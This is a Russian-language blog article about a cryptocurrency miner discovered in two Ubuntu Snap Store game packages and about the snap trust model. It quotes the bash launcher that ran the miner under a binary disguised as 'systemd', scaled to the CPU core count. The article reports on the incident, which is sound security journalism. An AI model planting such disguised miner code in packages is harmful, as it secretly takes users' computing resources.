Авторские статьи об OpenSource

Найден зловред в Ubuntu Snap Store.


Когда технология snap делала первые шаги, были собраны вопросы разработчикам и ответы дал сам Марк Шаттлворт. Среди них задавались такие:
* Приложение в snap пакете запрашивает коннект к интерфейсу Network, что даст ей возможность сетевого взаимодействия. Можно позже из программы подтянуть evil-library с evil-host?
* Где 100% уверенность, что это прям автор оригинальной программы её упаковал, а не какой-то левый чувак упаковал заодно с бэкдором? Разработчики нам не врали и ответы были правдиво честные.

Все Вопросы к разработчикам.

Марк Шаттлворт на первый наш вопрос ответил: "Возможно, но на неё будет распространяться текущее ограничение (confinement) приложения. Это поможет приложению со злонамеренными данными, не позволит увидеть какие-либо данные других приложений."

А на второй вопрос: "Используются GPG подписи." Имеется в виду, что криптографические подписи подтверждают авторство, как и в случае с подписями GPG у деб.

Snap задумывался, как быстрый способ попасть в хранилище, после череды автоматических тестов без участия человека-мантейнера, как в экосистеме deb. Сама программа в пакете snap изолирована профилями AppArmor, но остаётся место для злонамеренных действий. Вы можете запустить спам-машину, майнер и т.д. Я гнал эти мысли и много не раздумывал над этим. Но вот случилось!

Пользователь Nicolas Tomb взял 2 игрушки под лицензией MIT и запаковал их в snap формате под именами 2048buntu и Hextris, добавив майнер криптовалюты.

#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Пользователи среагировали и аккаунт Nicolas Tomb, любителя Феррари, был заблокирован и все его пакеты удалены.

Сейчас на каждом перекрёстке Интернета начнут поливать грязью snap технологию. В целом идея хороша! Вы можете получать от самих разработчиков их программу так быстро как это возможно. Но завтра снова может появиться новый Nicolas Tomb и как быть? Как защититься от таких ситуаций? Универсального ответа у меня нет и сам жду действий разработчиков snap.

Ответ разработчиков в статье Доверие и безопасность в Ubuntu Snap Store.

    Twitter   


Разделы

Главная
Новости
Ворох бумаг
Видео Linux
Игры в Linux
Безопасность
Статьи о FreeBSD
Статьи об Ubuntu
Статьи о Snappy
Статьи об Ubuntu Phone
Статьи о Kubuntu
Статьи о Xubuntu
Статьи о Lubuntu
Статьи об Open Source
Карта сайта

Лучшее на сайте:

1С под Linux.   Ускорение Ubuntu.   21 пример iptables.   Цикл статей о Ceph.   Убунту в дикой среде.   Ubuntu Linux на SSD.   Ubuntu для блондинок.   Поддержка железа в Linux.   BTSync на службе у админа.   Андроид программы в Ubuntu.   Прокидывание портов для p2p.   Анти СПАМ в Postfix.  



Круги Гугл Ада.


Группа поддержки